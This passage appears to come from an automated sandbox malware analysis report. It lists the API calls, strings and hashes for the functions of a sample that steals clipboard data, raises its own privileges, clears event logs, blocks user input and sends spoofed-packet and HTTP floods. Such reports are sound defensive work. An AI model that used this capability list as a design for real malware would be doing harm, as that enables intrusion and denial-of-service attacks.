                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpimouse_event
                                                                                              • String ID:
                                                                                              • API String ID: 1258999209-0
                                                                                              • Opcode ID: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
                                                                                              • Instruction ID: 813ed5156889d3fee33ae762c864079a57abd66bf6c8d8a424e07c18233b4e17
                                                                                              • Opcode Fuzzy Hash: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
                                                                                              • Instruction Fuzzy Hash: F34191317C0365BAF230CA148C8BF6A76A5E744F81F30811AF745FEAC9C5E4B940A69D
                                                                                              APIs
                                                                                              • OpenClipboard.USER32(00000000), ref: 1000FA9A
                                                                                              • GetClipboardData.USER32(00000001), ref: 1000FAA6
                                                                                              • CloseClipboard.USER32 ref: 1000FAB6
                                                                                              • GlobalSize.KERNEL32(00000000), ref: 1000FAC5
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 1000FACF
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 1000FAD8
                                                                                              • GlobalUnlock.KERNEL32(?), ref: 1000FAFF
                                                                                              • CloseClipboard.USER32 ref: 1000FB05
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000001), ref: 1000FB17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$Close$??2@??3@DataLockOpenSizeUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3218637236-0
                                                                                              • Opcode ID: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                                                                                              • Instruction ID: 8bd8b15d585b0a66e5e0549ea23a2daac3cce8b349df5dd2cf32f6ef4495ba93
                                                                                              • Opcode Fuzzy Hash: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                                                                                              • Instruction Fuzzy Hash: 410122356043646FE700EF349C89AAB379AFF45741F404528FD0686200EBB5AC08C6B2
                                                                                              APIs
                                                                                              • OpenClipboard.USER32(00000000), ref: 1000FA22
                                                                                              • EmptyClipboard.USER32 ref: 1000FA2E
                                                                                              • GlobalAlloc.KERNEL32(00002000,?,?,?,?,?), ref: 1000FA3E
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 1000FA4C
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 1000FA69
                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 1000FA72
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000FA79
                                                                                              • CloseClipboard.USER32 ref: 1000FA80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 453615576-0
                                                                                              • Opcode ID: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                                                                                              • Instruction ID: 6a4c86568739cfa889f9428084719cbd4829a3f5d72f13fa7c8734bacd2a58ba
                                                                                              • Opcode Fuzzy Hash: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                                                                                              • Instruction Fuzzy Hash: 5EF01D722003A19BF704AB708CCCA6B3A9AFB59792F040428FA46D6251CFA48C06D761
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
                                                                                              • GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
                                                                                              • CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID:
                                                                                              • API String ID: 3398352648-0
                                                                                              • Opcode ID: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                                                                                              • Instruction ID: cc3510a64544969e40c7ba664627dc8a20d979994d2bd73b5cc00ac410b68b64
                                                                                              • Opcode Fuzzy Hash: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                                                                                              • Instruction Fuzzy Hash: D401B171604361ABF704DB64CC8AF9B77A9FF88B00F41892CF9858A190D7F4EC449BA1
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000021,?,00000021,00000000,00000001), ref: 10008F3F
                                                                                              • FindClose.KERNEL32(00000000), ref: 10008FB9
                                                                                              • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10008FD1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10008FFB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseFileFind$CreateFirstHandle
                                                                                              • String ID: p
                                                                                              • API String ID: 3283578348-2181537457
                                                                                              • Opcode ID: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                                                                                              • Instruction ID: a9351d47ce1d038b449e59aee4ebb529ff1c7d311b8e8fe0981f574282c16cb6
                                                                                              • Opcode Fuzzy Hash: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                                                                                              • Instruction Fuzzy Hash: E931B5719083139BE324DF28CC4576AB6AAFBC43E0F15853EF8999B3D4C6748A448792
                                                                                              APIs
                                                                                              • OpenEventLogA.ADVAPI32(00000000), ref: 1000A50C
                                                                                              • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000A517
                                                                                              • CloseEventLog.ADVAPI32(00000000), ref: 1000A51A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Event$ClearCloseOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1391105993-0
                                                                                              • Opcode ID: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
                                                                                              • Instruction ID: 2f13a3a00fc351755ca7788bc276ed95c0dd4850e5c3601e4dc9bed05caac4f8
                                                                                              • Opcode Fuzzy Hash: 2e8b92724baef040b74a099688e4ca11ceeaa7323f097ad490cf6ea05752eb0a
                                                                                              • Instruction Fuzzy Hash: 6EF096715057529BE300DF09CC80B5FBBE4FF85750F800908FA5497210D3B5AA598BEA
                                                                                              APIs
                                                                                              • BlockInput.USER32(00000000), ref: 1000F45C
                                                                                              • BlockInput.USER32(?,?,?,00000000), ref: 1000F475
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: BlockInput
                                                                                              • String ID:
                                                                                              • API String ID: 3456056419-0
                                                                                              • Opcode ID: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
                                                                                              • Instruction ID: f75e578da579e437ca953510df7974459397082eec6ccbfe99a7c7589e24c54f
                                                                                              • Opcode Fuzzy Hash: 89eaa9efebe0b394a2daade3a841e7d355f6256b3a47bd97c9d23898dd999a22
                                                                                              • Instruction Fuzzy Hash: 4B411837B486849BC314DF98A441BBEFB75FBC6621F0086AFE85583B00CB366914D7A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: hXMV$hXMV
                                                                                              • API String ID: 0-400149659
                                                                                              • Opcode ID: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
                                                                                              • Instruction ID: 79a79fee38ca8a1330c9593f9425e5eef8b4821128400f5dbd5ea3b8bade0337
                                                                                              • Opcode Fuzzy Hash: bb9fbec34bb74b578b789555242fbb2c4049be8c3a5e02f866b0156cd7be93d0
                                                                                              • Instruction Fuzzy Hash: 08F0C272D08685AAD7008B4ADC51BAFFBB8E745B20F20422AE524537C1D63A18018AA0
                                                                                              APIs
                                                                                              • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 10002814
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: NtdllProc_Window
                                                                                              • String ID:
                                                                                              • API String ID: 4255912815-0
                                                                                              • Opcode ID: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                                                                                              • Instruction ID: 58df3dc0681e3f39cf6c8608bd8a8251fa6d00a740b542f493d238d21b34862f
                                                                                              • Opcode Fuzzy Hash: cd21bd2416f1a32ff3a22d08b90a7fc46063fe3e610cbd224e1e98767f6be9da
                                                                                              • Instruction Fuzzy Hash: 0CC0EAB9608351AFD604CB54C888D6BB7E9EBC8340F00C909B59A83254C770E840CB22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
                                                                                              • Instruction ID: afa899698315f790dea508b65044e70b833291bd3a009e442af8b39958c29264
                                                                                              • Opcode Fuzzy Hash: 4162b8fd09a8058dfffab31c4ebf9cf9939f72c70a79160d24adbb6f6ac3f189
                                                                                              • Instruction Fuzzy Hash: 781182B2B68D170AFB1C55ACEC797793683E384319F1A9B3C570BC62C0DDBD69481198
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: htons$strcspn$strstr$inet_addr$strncpy$htonlsetsockopt$CountSleepSocketTickprintfrandsendtowsprintf
                                                                                              • String ID: %d.%d.%d.%d$192.168.1.244$@$E$P$http://
                                                                                              • API String ID: 322722939-1061493658
                                                                                              • Opcode ID: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
                                                                                              • Instruction ID: 029872f007aae8b741d3009860af6db6cc3886bdaffc2e790e906b1155b7fa43
                                                                                              • Opcode Fuzzy Hash: fa133e97be830d63c3937d69d0e00783affe932c38cfb30cb5e04117bf83879f
                                                                                              • Instruction Fuzzy Hash: DFE1E3715083859AE320CB74CC41BABB7E5FFC4344F004A1DFA9997291DA74AA49CB97
                                                                                              APIs
                                                                                              Strings
                                                                                              • %s, xrefs: 1000542A
                                                                                              • %s, xrefs: 100053CD
                                                                                              • http://, xrefs: 100051B4, 10005205, 10005214
                                                                                              • GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-, xrefs: 10005416
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcspn$printfstrstr$ExitThreadUserclosesocketstrncpy$Sleepinet_addr$connectgethostbynamehtonsinet_ntoasendsocketsprintf
                                                                                              • String ID: %s$%s$GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-$http://
                                                                                              • API String ID: 3360081097-1844242639
                                                                                              • Opcode ID: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
                                                                                              • Instruction ID: e8874cd066fd205268a75987e0b1d8bfdcdc385e397420bfea7b2cf98142489c
                                                                                              • Opcode Fuzzy Hash: a09e518b96f0db453f2d109b9515bce755ecc3f272282edc9d1fbb50c6695935
                                                                                              • Instruction Fuzzy Hash: 9F91E6325043146BE304DB74CC84AAB7BE9EFC9351F044A18FA5693290DFB5EA49C795
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcspn$strstr$printfstrncpy$CountExitThreadTickUserinet_addr$CleanupSleepSocketclosesocketgethostbynameinet_ntoarandsendtosetsockoptsrandtime
                                                                                              • String ID: %s$http://
                                                                                              • API String ID: 2910787541-1591606595
                                                                                              • Opcode ID: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
                                                                                              • Instruction ID: 34865b7dc30fd38a5ae5f0f06fbf564a450e17f044507f999930ee5d5a8d3fda
                                                                                              • Opcode Fuzzy Hash: 714e4b3f82d11a8d2cdf065614fefdc8eb5a61599fc4361ed26ed8b059713b7f
                                                                                              • Instruction Fuzzy Hash: 78A1E5315043516BE314DB74CC84AAB7BEAFFC8350F404A2DF65697290EFB49A48CB96
                                                                                              APIs
                                                                                                • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                                                                                • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00001F40,00001F40), ref: 100119D6
                                                                                              • LocalAlloc.KERNEL32 ref: 10011A04
                                                                                              • Sleep.KERNEL32(00000001), ref: 10011A19
                                                                                              • Process32First.KERNEL32(00000000,?), ref: 10011A28
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?), ref: 10011A4B
                                                                                              • EnumProcessModules.PSAPI(00000000,00000040,00000004,?,?,00000000,?), ref: 10011A85
                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011A9D
                                                                                              • GetPriorityClass.KERNEL32(00000000,00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011AA9
                                                                                              • wsprintfA.USER32 ref: 10011B3F
                                                                                              • lstrlen.KERNEL32(?,?,?,?,00000002,00000000,00001F40,00001F40), ref: 10011B75
                                                                                              • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B7E
                                                                                              • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011B87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$lstrlen$Open$AllocClassCreateCurrentEnumFileFirstLocalModuleModulesNamePriorityProcess32SleepSnapshotTokenToolhelp32wsprintf
                                                                                              • String ID: SYSTEM$SeDebugPrivilege
                                                                                              • API String ID: 1285126458-3052852743
                                                                                              • Opcode ID: 603ccc89775ea0e1e94ae0ec46c0b3118b3e6a6ea331a101648a88a52926951f
                                                                                              • Instruction ID: 0b961047b44daba82c00bbc082a7763861cb1e17bb1e44bbf086e1eb6c632ac9
                                                                                              • Opcode Fuzzy Hash: 603ccc89775ea0e1e94ae0ec46c0b3118b3e6a6ea331a101648a88a52926951f
                                                                                              • Instruction Fuzzy Hash: 29B1A2712083459BE718CB24CC91AEFB3E6FBC4704F41492CFA8597240EB79E949CB96
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: rand$htons$inet_addrsetsockopt$ExitSleepSocketStartupThreadUserhtonlsendtosprintf
                                                                                              • String ID: %d.%d.%d.%d$@$E$P$d
                                                                                              • API String ID: 872198723-3606021318
                                                                                              • Opcode ID: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
                                                                                              • Instruction ID: 8a7fd5c6b9d9dc2a36ee797d2ff7afdd41ddcd881716b64bea6de97d131c0ef0
                                                                                              • Opcode Fuzzy Hash: a2e921a84f5a9370c1cbf23c0c7c279e28e6e32964bf80e14801a405c00669c0
